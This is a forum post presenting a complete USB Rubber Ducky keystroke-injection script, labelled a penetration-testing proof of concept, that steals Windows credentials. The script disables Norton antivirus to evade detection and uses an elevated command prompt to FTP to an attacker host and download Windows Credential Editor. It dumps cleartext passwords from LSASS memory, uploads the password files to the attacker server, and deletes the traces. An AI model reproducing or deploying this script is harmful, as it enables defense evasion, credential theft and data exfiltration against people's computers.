Jump to content

Recommended Posts

Hi Folks,
I wanted to share a new script I developed that shows a proof of concept for a rubber ducky and Windows Credential Editor (WCE) script that would would do the following:


1.) Disable Antivirus for 15 minutes which is default. (This must be done to avoid signiture detection of WCE executable)

2.) FTP to attacker machine on the network, downloading the 32-bit & 64-bit version of WCE

3.) Script then executes both versions, sending the output to a text file with the computer name as the variable of the file name. Note: One executable will fail (64 or 32 bit), but it will not write to the output file.

4.) Script will then upload the file containing cleartext passwords for users logged in based on LSASS memory

5.) The script will then remove all WCE executables as well the cleartext password file created before the antivirus program automatically start. Then closes all appropriate windows


The video demo can be found at:
http://youtu.be/IqUci4buvvM



Below is a copy of the script. Note: This is a proof of concept and will need to be tweaked per environment and penetration testing engagement.

----------------------------------------------------------------------------------------------------------------------------------------------
code below:


REM ######################################################################################################
REM # Author: G1 #
REM # OS Designed and Tested on: Windows 7 SP1 x64 #
REM # Anti-Virus Version: Norton Security Suite v 6.4.0.9 on Windows 7 OS #
REM # FTP Platform: Backtrack 5 R3 / PureFTPD #
REM # Rubber Ducky Encoder Required: Use Dnucna's 2.1 or greater #
REM # http://code.google.com/p/ducky-decode/downloads/list #
REM # #
REM # This script was developed and intended to capture cleartext credentials stored in LSASS via #
REM # Windows Credential Editor(WCE).  The method process below contains these main sections: #
REM # #
REM #   1.) Disable Antivirus for 15 minutes which is default. (This must be done to avoid signiture #
REM #       detection of WCE executables) #
REM #   2.) FTP to attacker machine on the network, downloading the 32-bit & 64-bit version of WCE #
REM #   3.) Script then executes both versions, sending the output to a text file with the computer name #
REM #       as the variable of the file name. Note: One executable will fail (64 or 32 bit), but it #
REM #       will not write to the output file. #
REM #   4.) Script will then upload the file containing cleartext passwords for users logged in based on #
REM #       LSASS memory #
REM #   5.) The script will then remove all WCE executables as well the cleartext password file   #
REM #       created before the antivirus program automatically start. Then closes all appropriate windows#
REM # #
REM # Prerequisites: #
REM #  - User of the targeted system MUST have ADMINISTATOR level access. #
REM #  - Attacker must maintain a copy of the 32-bit and 64-bit version of WCE in their FTP directory #
REM #  - Attacker's FTP server must have at least one directory that is writable. #
REM # #
REM # This script is meant as a guide and proof of concept of the usb rubber ducky. Tweaks for AV #
REM # versions, FTP verisons and delays times may vary depending on the environment. #  
REM # #
REM #         #
REM # #
REM ######################################################################################################
REM
REM ***********************************************************************************
REM ****************NORTON-SECURITY-SUITE-N360*****************************************
REM **********ANTI-VIRUS-VERSION-6.4.0.9--OS:Windows7**********************************
REM ******************15-Minute-Disable************************************************
REM ***********************************************************************************
DELAY 1000
CTRL ESCAPE
DELAY 200
STRING Norton Security Suite
DELAY 100
ENTER
DELAY 3000
TAB
DELAY 500
ENTER
DELAY 2500
TAB
TAB
DELAY 50
ENTER
DELAY 2500
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
DELAY 500
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
TAB
TAB
DELAY 50
ENTER
DELAY 500
SHIFT TAB
DELAY 50
ENTER
DELAY 3000
SHIFT TAB
DELAY 100
ENTER
DELAY 2000
SHIFT TAB
DELAY 100
ENTER
DELAY 1000
ALT F4
REM ***********************************************************************************
REM ********************END-OF-NORTON-AV-DISABLE***************************************
REM ***********************************************************************************
REM                   -------------------------------------
REM ***********************************************************************************
REM FTP spawn to retrieve Windows Credential Editor 32-bit and 64-bit executables(wce.exe and wce_64.exe)
REM ***********************************************************************************
REM ***********************************************************************************
DELAY 500
CTRL ESCAPE
DELAY 200
STRING cmd
DELAY 1500
CTRL-SHIFT ENTER
DELAY 4000
LEFT
DELAY 100
ENTER
DELAY 1000
STRING ftp 192.168.1.140
ENTER
DELAY 1000
REM FTP USERNAME below
STRING <FTP USER>
ENTER
DELAY 500
REM FTP User password
STRING <FTP PASSWORD>
ENTER
DELAY 700
STRING binary
ENTER
DELAY 100
STRING prompt
ENTER
DELAY 100
REM Assuming the wce.exe and wce_64.exe are in the root directory of the FTP server.
STRING mget wce*
ENTER
DELAY 1000
REM ***********************************************************************************
REM ***********************************************************************************
REM Opening second Administrative command window to process FTP executables
REM ***********************************************************************************
REM ***********************************************************************************
CTRL ESCAPE
DELAY 200
STRING cmd
DELAY 1500
CTRL-SHIFT ENTER
DELAY 4000
LEFT
DELAY 100
ENTER
DELAY 1000
REM ***********************************************************************************
REM ***********************************************************************************
REM Pulling cleartext credentials for 64-bit and saving the file as %computername%-cleartext-PWs-64bit.txt
REM ***********************************************************************************
REM ***********************************************************************************
STRING wce_64.exe -w -o %computername%-cleartext-PWs-64bit.txt
ENTER
DELAY 3000
REM ***********************************************************************************
REM ***********************************************************************************
REM Pulling cleartext credentials for 32-bit and saving the file as %computername%-cleartext-PWs-32bit.txt
REM ***********************************************************************************
REM ***********************************************************************************
STRING wce.exe -w -o %computername%-cleartext-PWs-32bit.txt
ENTER
DELAY 3000
ALT TAB
REM ***********************************************************************************
REM ***********************************************************************************
REM Back to FTP session on initial command window, entering writable directory for upload
REM ***********************************************************************************
REM ***********************************************************************************
DELAY 200
STRING cd upload
ENTER
DELAY 100
REM ***********************************************************************************
REM ***********************************************************************************
REM Upload all cleartext password files from the Windows Credential Editor command.
REM ***********************************************************************************
REM ***********************************************************************************
STRING mput *cleartext-PWs*
ENTER
DELAY 2000
STRING quit
ENTER
DELAY 500
STRING exit
ENTER
DELAY 50
REM ***********************************************************************************
REM ***********************************************************************************
REM Cleaning up the files created and exiting command windows.
REM ***********************************************************************************
REM ***********************************************************************************
STRING del wce.exe wce_64.exe %computername%-cleartext-PWs-64bit.txt %computername%-cleartext-PWs-32bit.txt
ENTER
DELAY 100
STRING exit
ENTER
 


------------------------------------------------------------------------------------------------------------------------

Edited by midnitesnake
corrected formatting
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...